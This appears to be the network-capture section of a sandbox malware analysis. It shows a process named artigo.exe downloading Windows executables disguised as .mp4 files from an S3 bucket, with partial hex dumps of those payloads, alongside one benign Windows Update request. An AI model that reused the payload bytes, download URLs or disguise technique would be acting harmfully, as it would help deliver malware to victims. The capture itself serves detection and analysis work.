                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  41192.168.2.4497824.245.163.56443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:05 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rBgTCMhWGuf+1Pc&MD=RoRLZT8E HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                  2024-11-14 14:00:05 UTC560INHTTP/1.1 200 OK
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Expires: -1
                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                  MS-CorrelationId: 62002161-0402-49cc-91a0-8816a746a328
                                                                                                                  MS-RequestId: 07a65de5-9c1c-4f70-acae-6a253f2c5f16
                                                                                                                  MS-CV: 7uoFpbOQlkuaEg5Y.0
                                                                                                                  X-Microsoft-SLSClientCache: 2880
                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:04 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 24490
                                                                                                                  2024-11-14 14:00:05 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                  2024-11-14 14:00:05 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  42192.168.2.44978816.12.9.464437892C:\Users\Public\Termos\artigo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:14 UTC141OUTGET /basketchampion.mp4 HTTP/1.1
                                                                                                                  User-Agent: lspcv2.exe
                                                                                                                  Host: happychristmaslegado.s3.eu-north-1.amazonaws.com
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2024-11-14 14:00:14 UTC420INHTTP/1.1 200 OK
                                                                                                                  x-amz-id-2: 8oDLDjHVU4jhhgj6AzW1afiVhHfPKHRirPToY1bpeb5hy6lsN0th9kXNtNZ5FapcQZmcIk5CjiU=
                                                                                                                  x-amz-request-id: ZJBG4Z0CEYDBDET0
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:15 GMT
                                                                                                                  Last-Modified: Wed, 13 Nov 2024 10:55:34 GMT
                                                                                                                  ETag: "1ebfee2e076e5082ab276012cc572f9e-2"
                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Type: video/mp4
                                                                                                                  Content-Length: 32891509
                                                                                                                  Server: AmazonS3
                                                                                                                  Connection: close
                                                                                                                  2024-11-14 14:00:14 UTC16384INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZP@!L!This program must be run under Win64$7
                                                                                                                  2024-11-14 14:00:14 UTC604INData Raw: 00 00 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 b8 10 40 00 00 00 00 00 00 00 05 43 6f 75 6e 74 02 00 02 00 7e 00 00 aa 41 00 00 00 00 00 04 43 6f 70 79 03 00 00 00 00 00 00 00 00 00 38 00 05 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 a8 65 40 00 00 00 00 00 00 00 03 53 72 63 02 00 00 b8 10 40 00 00 00 00 00 00 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 10 98 43 40 00 00 00 00 00 00 00 04 44 65 73 74 02 00 00 b8 10 40 00 00 00 00 00 00 00 05 43 6f 75 6e 74 02 00 02 00 7e 00 30 aa 41 00 00 00 00 00 04 43 6f 70 79 03 00 00 00 00 00 00 00 00 00 38 00 05 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 98 43 40 00 00 00 00 00 00 00 03 53 72 63 02 00 01 a8 65 40 00 00 00 00 00 00 00 04 44 65 73 74 02 00 00 b8 10 40 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: StartIndex@Count~ACopy8Selfe@Src@StartIndexC@Dest@Count~0ACopy8SelfC@Srce@Dest@
                                                                                                                  2024-11-14 14:00:14 UTC16384INData Raw: 00 b8 10 40 00 00 00 00 00 00 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 10 98 43 40 00 00 00 00 00 00 00 04 44 65 73 74 02 00 00 b8 10 40 00 00 00 00 00 00 00 05 43 6f 75 6e 74 02 00 02 00 7e 00 f0 aa 41 00 00 00 00 00 04 43 6f 70 79 03 00 00 00 00 00 00 00 00 00 38 00 05 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 98 43 40 00 00 00 00 00 00 00 03 53 72 63 02 00 01 38 66 40 00 00 00 00 00 00 00 04 44 65 73 74 02 00 00 b8 10 40 00 00 00 00 00 00 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 b8 10 40 00 00 00 00 00 00 00 05 43 6f 75 6e 74 02 00 02 00 7e 00 10 ab 41 00 00 00 00 00 04 43 6f 70 79 03 00 00 00 00 00 00 00 00 00 38 00 05 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 88 66 40 00 00 00 00 00 00 00 03 53 72 63 02 00 00 b8 10
                                                                                                                  Data Ascii: @StartIndexC@Dest@Count~ACopy8SelfC@Src8f@Dest@StartIndex@Count~ACopy8Selff@Src
                                                                                                                  2024-11-14 14:00:14 UTC1024INData Raw: 47 78 00 00 48 8b 4d 28 48 3b c8 48 89 4d 28 77 0e 83 c3 01 48 83 c7 08 83 ee 01 85 f6 75 b0 90 48 8b 0d 5d 12 48 00 e8 b8 88 00 00 48 8b 0d 51 12 48 00 48 8b 55 28 41 89 c0 e8 b5 f5 ff ff 48 8d 4d 48 48 8b 15 42 12 48 00 e8 a5 f3 ff ff 48 8d a5 58 e0 03 00 5b 5e 5f 41 5d 41 5e 5d c3 cc cc cc cc cc 33 d2 33 c9 4c 8d 0d 37 12 48 00 80 3d ae 1d 48 00 00 74 0a 49 0f b7 01 66 a9 0f 00 75 2b 45 0f b7 01 41 c1 e8 03 b0 04 f6 e9 41 3b d0 73 16 4c 8d 15 46 fb 4e 00 44 8b da 43 88 04 1a 83 c2 01 41 3b d0 72 ea 90 44 89 c2 83 c1 01 49 83 c1 40 83 f9 2e 75 b6 90 c3 cc cc cc cc cc cc cc cc cc 48 83 ec 28 41 b9 2e 00 00 00 4c 8d 05 cf 11 48 00 4d 89 40 10 4d 89 40 08 49 c7 40 20 00 00 00 00 49 c7 40 18 01 00 00 00 41 0f b7 40 02 c1 e0 02 48 8d 04 40 05 ff 00 00 00 25
                                                                                                                  Data Ascii: GxHM(H;HM(wHuH]HHQHHU(AHMHHBHHX[^_A]A^]33L7H=HtIfu+EAA;sLFNDCA;rDI@.uH(A.LHM@M@I@ I@A@H@%
                                                                                                                  2024-11-14 14:00:14 UTC16384INData Raw: cc cc cc cc 53 48 83 ec 20 48 85 c9 75 04 33 db eb 13 ff 15 1c 1a 48 00 89 c3 85 db 74 07 b1 02 e8 cf 02 00 00 89 d8 48 83 c4 20 5b c3 cc cc cc cc cc cc cc 56 53 48 83 ec 28 48 89 cb 48 83 3b 00 74 3a 48 85 d2 7e 1a 48 8b 0b ff 15 eb 19 48 00 48 89 c6 48 85 f6 75 1f b1 01 e8 94 02 00 00 eb 16 48 8b 0b ff 15 c9 19 48 00 85 c0 74 07 b1 02 e8 7e 02 00 00 33 f6 48 89 33 eb 24 48 85 d2 7f 04 33 f6 eb 1b 48 89 d1 ff 15 9d 19 48 00 48 89 c6 48 85 f6 75 07 b1 01 e8 56 02 00 00 48 89 33 48 89 f0 48 83 c4 28 5b 5e c3 cc cc cc cc cc cc cc cc cc 55 57 56 53 48 83 ec 28 48 8b ec 33 f6 33 db e8 4c 27 01 00 48 63 fb 48 8d 0c 25 00 00 00 00 48 8d 44 08 18 48 8b cf 48 c1 e1 02 80 3c c8 00 75 1b e8 2a 27 01 00 48 8d 0c 25 00 00 00 00 48 8d 04 08 48 c1 e7 02 48 8d 34 f8 eb
                                                                                                                  Data Ascii: SH Hu3HtH [VSH(HH;t:H~HHHHuHHt~3H3$H3HHHHuVH3HH([^UWVSH(H33L'HcH%HDHH<u*'H%HHH4
                                                                                                                  2024-11-14 14:00:14 UTC1024INData Raw: eb 05 85 db 0f 84 4e 01 00 00 8b f3 83 e6 07 85 f6 74 32 48 63 f6 48 89 e9 66 0f 29 f1 48 8d 05 10 ef 47 00 48 8b d6 48 03 d2 4c 8b 04 d0 48 8d 05 07 ef 47 00 48 03 f6 4c 8b 0c f0 e8 b3 fe ff ff 66 0f 29 c6 8b f3 c1 ee 03 85 f6 7e 25 48 89 e9 66 0f 29 f1 4c 8b 05 d8 ef 47 00 4c 8b 0d d9 ef 47 00 e8 8c fe ff ff 66 0f 29 c6 83 ee 01 85 f6 7f db 90 e9 df 00 00 00 85 db 0f 8d d7 00 00 00 f7 db 81 fb 78 02 00 00 7c 19 b9 10 00 00 00 b2 01 e8 7d ca ff ff f2 0f 10 35 ed 00 00 00 e9 ce 00 00 00 8b f3 83 e6 1f 85 f6 74 32 48 63 f6 48 89 e9 66 0f 29 f1 48 8d 05 76 ec 47 00 48 8b d6 48 03 d2 4c 8b 04 d0 48 8d 05 6d ec 47 00 48 03 f6 4c 8b 0c f0 e8 19 fe ff ff 66 0f 29 c6 c1 eb 05 85 db 74 72 8b f3 83 e6 07 85 f6 74 32 48 63 f6 48 89 e9 66 0f 29 f1 48 8d 05 b4 ee 47
                                                                                                                  Data Ascii: Nt2HcHf)HGHHLHGHLf)~%Hf)LGLGf)x|}5t2HcHf)HvGHHLHmGHLf)trt2HcHf)HG
                                                                                                                  2024-11-14 14:00:14 UTC16384INData Raw: cc cc cc cc 57 56 53 48 83 ec 20 48 89 cb 48 89 d6 48 0f b6 3e 48 89 d9 89 fa e8 b5 52 00 00 48 8b 03 eb 13 66 0f b6 0c 3e 80 f9 80 73 0e 66 89 4c 78 fe 48 83 ef 01 48 85 ff 7f e8 90 48 85 ff 7e 0b 48 89 d9 48 89 f2 e8 57 cf 00 00 48 89 d8 48 83 c4 20 5b 5e 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc 41 55 57 56 53 48 83 ec 28 48 89 cb 48 89 d6 48 0f b6 3b 4c 8d 6b 01 48 89 f1 e8 d1 4f 00 00 66 41 0f b6 4d 00 48 0f b7 10 eb 16 48 83 c0 02 49 83 c5 01 40 80 ef 01 66 41 0f b6 4d 00 48 0f b7 10 40 84 ff 76 31 66 85 d2 74 2c 44 8b c2 66 41 f7 c0 80 ff 75 21 44 8b c1 66 41 f7 c0 80 00 75 16 44 8b c1 66 41 83 c8 20 44 8b ca 66 41 83 c9 20 66 45 3b c1 74 b4 66 85 d2 74 1f 66 f7 c2 80 ff 75 0b 66 f7 c1 80 00 75 04 33 c0 eb 13 48 89 d9 48 89 f2 e8 a7 fd ff ff eb 06
                                                                                                                  Data Ascii: WVSH HHH>HRHf>sfLxHHH~HHWHH [^_AUWVSH(HHH;LkHOfAMHHI@fAMH@v1ft,DfAu!DfAuDfA DfA fE;tftfufu3HH
                                                                                                                  2024-11-14 14:00:14 UTC1024INData Raw: e8 2f f7 ff ff 48 89 c7 48 89 f1 e8 e4 0a 00 00 48 89 c1 48 89 fa 4d 63 c5 e8 56 82 ff ff eb 0e 48 8d 40 f0 b9 01 00 00 00 f0 0f c1 48 08 48 8b 03 48 89 3b 48 85 c0 74 22 48 8d 40 f0 83 78 08 00 7e 18 83 ca ff 8b ca f0 0f c1 50 08 03 ca 85 c9 75 08 48 89 c1 e8 a9 7b ff ff 48 83 c4 28 5b 5e 5f 41 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 89 d0 48 85 c0 74 16 48 8d 40 f0 83 78 08 00 7c 0c 41 b8 01 00 00 00 f0 44 0f c1 40 08 48 8b 01 48 89 11 48 85 c0 74 22 48 8d 40 f0 83 78 08 00 7e 18 83 ca ff 8b ca f0 0f c1 50 08 03 ca 85 c9 75 08 48 89 c1 e8 41 7b ff ff 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc 33 c0 48 85 c9 74 03 8b 41 fc c3 cc cc cc cc cc 33 c0 48 85 c9 74 0e eb 03 83 c0 01 48 63 d0 80 3c 11 00 75 f4 c3 cc cc cc cc cc
                                                                                                                  Data Ascii: /HHHHMcVH@HHH;Ht"H@x~PuH{H([^_A]H(HHtH@x|AD@HHHt"H@x~PuHA{H(3HtA3HtHc<u
                                                                                                                  2024-11-14 14:00:14 UTC16384INData Raw: cc cc cc cc 48 89 54 24 10 48 89 c8 48 0f b6 00 48 8b 54 24 10 48 0f b6 12 44 8b c8 44 03 ca 45 3b c8 7e 05 41 8b d0 2b d0 44 8b c0 44 02 c2 44 88 01 41 b8 01 00 00 00 41 89 d1 44 89 c2 41 3b d1 7f 31 45 2b c8 41 83 c1 01 4c 8b 44 24 10 4d 8d 40 01 44 8b d0 44 03 d2 4d 63 d2 4d 0f b6 18 46 88 1c 11 83 c2 01 49 83 c0 01 41 83 e9 01 45 85 c9 75 df 90 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 88 54 24 38 48 8d 54 24 38 b8 01 00 00 00 45 89 c1 41 89 c0 e8 13 f7 ff ff 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 33 c0 48 85 d2 74 10 48 89 d0 eb 04 48 83 c0 01 80 38 00 75 f7 2b c2 45 89 c1 41 89 c0 e8 da f6 ff ff 48 83 c4 28 c3 cc cc cc cc cc 48 83 ec 28 33 c0 48 85 d2 74 1c 48 89 d0 eb 04 48 83 c0 02 66 83 38 00 75 f6 48
                                                                                                                  Data Ascii: HT$HHHT$HDDE;~A+DDDAADA;1E+ALD$M@DDMcMFIAEuH(T$8HT$8EAH(H(3HtHH8u+EAH(H(3HtHHf8uH
                                                                                                                  2024-11-14 14:00:14 UTC1024INData Raw: cc cc cc cc 48 83 ec 28 48 85 d2 74 19 48 89 d0 4d 33 c9 48 8b 52 f8 48 89 54 24 20 48 89 c2 e8 10 00 00 00 eb 08 4c 89 c2 e8 66 01 00 00 48 83 c4 28 c3 cc 41 56 41 55 57 56 53 48 83 ec 30 48 89 54 24 20 4c 89 44 24 28 4c 89 cb 48 89 4c 24 60 33 ff 48 8b 44 24 20 48 85 c0 0f 84 09 01 00 00 48 8b 74 24 28 48 85 db 7d 0a 48 01 9c 24 80 00 00 00 33 db 48 8b 44 24 20 48 8b 40 f8 48 3b d8 7e 03 48 89 c3 48 2b c3 48 39 84 24 80 00 00 00 7e 08 48 89 84 24 80 00 00 00 48 83 bc 24 80 00 00 00 00 7d 0c 48 c7 84 24 80 00 00 00 00 00 00 00 48 83 bc 24 80 00 00 00 00 0f 8e a9 00 00 00 48 0f b6 46 01 48 03 f0 8b 46 02 48 8b 4e 06 48 85 c9 74 05 48 8b 31 eb 02 33 f6 4c 63 e8 4c 8b b4 24 80 00 00 00 4d 0f af f5 49 8d 4e 10 e8 e0 36 ff ff 48 89 c7 48 89 f8 c7 40 04 01 00
                                                                                                                  Data Ascii: H(HtHM3HRHT$ HLfH(AVAUWVSH0HT$ LD$(LHL$`3HD$ HHt$(H}H$3HD$ H@H;~HH+H9$~H$H$}H$H$HFHFHNHtH13LcL$MIN6HH@


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  43192.168.2.44978916.12.9.464437892C:\Users\Public\Termos\artigo.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:14 UTC136OUTGET /alphaville.mp4 HTTP/1.1
                                                                                                                  User-Agent: place.exe
                                                                                                                  Host: happychristmaslegado.s3.eu-north-1.amazonaws.com
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2024-11-14 14:00:14 UTC420INHTTP/1.1 200 OK
                                                                                                                  x-amz-id-2: 383ShuUP2a3U97evcIPzGBPs4xSr1aLxP3KMtVF6AxmbfrDEhy6kswc+F4eoE52bXek1yF686ik=
                                                                                                                  x-amz-request-id: ZJBWE7PZGP2VQ7N1
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:15 GMT
                                                                                                                  Last-Modified: Wed, 13 Nov 2024 10:29:28 GMT
                                                                                                                  ETag: "25e2a378cda74225b345465dac630855-2"
                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Type: video/mp4
                                                                                                                  Content-Length: 19375329
                                                                                                                  Server: AmazonS3
                                                                                                                  Connection: close
                                                                                                                  2024-11-14 14:00:14 UTC16384INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: MZP@!L!This program must be run under Win64$7
                                                                                                                  2024-11-14 14:00:14 UTC604INData Raw: 00 00 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 b8 10 40 00 00 00 00 00 00 00 05 43 6f 75 6e 74 02 00 02 00 7e 00 00 aa 41 00 00 00 00 00 04 43 6f 70 79 03 00 00 00 00 00 00 00 00 00 38 00 05 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 a8 65 40 00 00 00 00 00 00 00 03 53 72 63 02 00 00 b8 10 40 00 00 00 00 00 00 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 10 98 43 40 00 00 00 00 00 00 00 04 44 65 73 74 02 00 00 b8 10 40 00 00 00 00 00 00 00 05 43 6f 75 6e 74 02 00 02 00 7e 00 30 aa 41 00 00 00 00 00 04 43 6f 70 79 03 00 00 00 00 00 00 00 00 00 38 00 05 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 98 43 40 00 00 00 00 00 00 00 03 53 72 63 02 00 01 a8 65 40 00 00 00 00 00 00 00 04 44 65 73 74 02 00 00 b8 10 40 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: StartIndex@Count~ACopy8Selfe@Src@StartIndexC@Dest@Count~0ACopy8SelfC@Srce@Dest@
                                                                                                                  2024-11-14 14:00:14 UTC16384INData Raw: 00 b8 10 40 00 00 00 00 00 00 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 10 98 43 40 00 00 00 00 00 00 00 04 44 65 73 74 02 00 00 b8 10 40 00 00 00 00 00 00 00 05 43 6f 75 6e 74 02 00 02 00 7e 00 f0 aa 41 00 00 00 00 00 04 43 6f 70 79 03 00 00 00 00 00 00 00 00 00 38 00 05 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 98 43 40 00 00 00 00 00 00 00 03 53 72 63 02 00 01 38 66 40 00 00 00 00 00 00 00 04 44 65 73 74 02 00 00 b8 10 40 00 00 00 00 00 00 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 b8 10 40 00 00 00 00 00 00 00 05 43 6f 75 6e 74 02 00 02 00 7e 00 10 ab 41 00 00 00 00 00 04 43 6f 70 79 03 00 00 00 00 00 00 00 00 00 38 00 05 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 88 66 40 00 00 00 00 00 00 00 03 53 72 63 02 00 00 b8 10
                                                                                                                  Data Ascii: @StartIndexC@Dest@Count~ACopy8SelfC@Src8f@Dest@StartIndex@Count~ACopy8Selff@Src
                                                                                                                  2024-11-14 14:00:14 UTC1024INData Raw: 47 78 00 00 48 8b 4d 28 48 3b c8 48 89 4d 28 77 0e 83 c3 01 48 83 c7 08 83 ee 01 85 f6 75 b0 90 48 8b 0d 5d 52 48 00 e8 b8 88 00 00 48 8b 0d 51 52 48 00 48 8b 55 28 41 89 c0 e8 b5 f5 ff ff 48 8d 4d 48 48 8b 15 42 52 48 00 e8 a5 f3 ff ff 48 8d a5 58 e0 03 00 5b 5e 5f 41 5d 41 5e 5d c3 cc cc cc cc cc 33 d2 33 c9 4c 8d 0d 37 52 48 00 80 3d ae 5d 48 00 00 74 0a 49 0f b7 01 66 a9 0f 00 75 2b 45 0f b7 01 41 c1 e8 03 b0 04 f6 e9 41 3b d0 73 16 4c 8d 15 46 3b 4f 00 44 8b da 43 88 04 1a 83 c2 01 41 3b d0 72 ea 90 44 89 c2 83 c1 01 49 83 c1 40 83 f9 2e 75 b6 90 c3 cc cc cc cc cc cc cc cc cc 48 83 ec 28 41 b9 2e 00 00 00 4c 8d 05 cf 51 48 00 4d 89 40 10 4d 89 40 08 49 c7 40 20 00 00 00 00 49 c7 40 18 01 00 00 00 41 0f b7 40 02 c1 e0 02 48 8d 04 40 05 ff 00 00 00 25
                                                                                                                  Data Ascii: GxHM(H;HM(wHuH]RHHQRHHU(AHMHHBRHHX[^_A]A^]33L7RH=]HtIfu+EAA;sLF;ODCA;rDI@.uH(A.LQHM@M@I@ I@A@H@%
                                                                                                                  2024-11-14 14:00:14 UTC16384INData Raw: cc cc cc cc 53 48 83 ec 20 48 85 c9 75 04 33 db eb 13 ff 15 1c 5a 48 00 89 c3 85 db 74 07 b1 02 e8 cf 02 00 00 89 d8 48 83 c4 20 5b c3 cc cc cc cc cc cc cc 56 53 48 83 ec 28 48 89 cb 48 83 3b 00 74 3a 48 85 d2 7e 1a 48 8b 0b ff 15 eb 59 48 00 48 89 c6 48 85 f6 75 1f b1 01 e8 94 02 00 00 eb 16 48 8b 0b ff 15 c9 59 48 00 85 c0 74 07 b1 02 e8 7e 02 00 00 33 f6 48 89 33 eb 24 48 85 d2 7f 04 33 f6 eb 1b 48 89 d1 ff 15 9d 59 48 00 48 89 c6 48 85 f6 75 07 b1 01 e8 56 02 00 00 48 89 33 48 89 f0 48 83 c4 28 5b 5e c3 cc cc cc cc cc cc cc cc cc 55 57 56 53 48 83 ec 28 48 8b ec 33 f6 33 db e8 4c 27 01 00 48 63 fb 48 8d 0c 25 00 00 00 00 48 8d 44 08 18 48 8b cf 48 c1 e1 02 80 3c c8 00 75 1b e8 2a 27 01 00 48 8d 0c 25 00 00 00 00 48 8d 04 08 48 c1 e7 02 48 8d 34 f8 eb
                                                                                                                  Data Ascii: SH Hu3ZHtH [VSH(HH;t:H~HYHHHuHYHt~3H3$H3HYHHHuVH3HH([^UWVSH(H33L'HcH%HDHH<u*'H%HHH4
                                                                                                                  2024-11-14 14:00:14 UTC1024INData Raw: eb 05 85 db 0f 84 4e 01 00 00 8b f3 83 e6 07 85 f6 74 32 48 63 f6 48 89 e9 66 0f 29 f1 48 8d 05 10 2f 48 00 48 8b d6 48 03 d2 4c 8b 04 d0 48 8d 05 07 2f 48 00 48 03 f6 4c 8b 0c f0 e8 b3 fe ff ff 66 0f 29 c6 8b f3 c1 ee 03 85 f6 7e 25 48 89 e9 66 0f 29 f1 4c 8b 05 d8 2f 48 00 4c 8b 0d d9 2f 48 00 e8 8c fe ff ff 66 0f 29 c6 83 ee 01 85 f6 7f db 90 e9 df 00 00 00 85 db 0f 8d d7 00 00 00 f7 db 81 fb 78 02 00 00 7c 19 b9 10 00 00 00 b2 01 e8 7d ca ff ff f2 0f 10 35 ed 00 00 00 e9 ce 00 00 00 8b f3 83 e6 1f 85 f6 74 32 48 63 f6 48 89 e9 66 0f 29 f1 48 8d 05 76 2c 48 00 48 8b d6 48 03 d2 4c 8b 04 d0 48 8d 05 6d 2c 48 00 48 03 f6 4c 8b 0c f0 e8 19 fe ff ff 66 0f 29 c6 c1 eb 05 85 db 74 72 8b f3 83 e6 07 85 f6 74 32 48 63 f6 48 89 e9 66 0f 29 f1 48 8d 05 b4 2e 48
                                                                                                                  Data Ascii: Nt2HcHf)H/HHHLH/HHLf)~%Hf)L/HL/Hf)x|}5t2HcHf)Hv,HHHLHm,HHLf)trt2HcHf)H.H
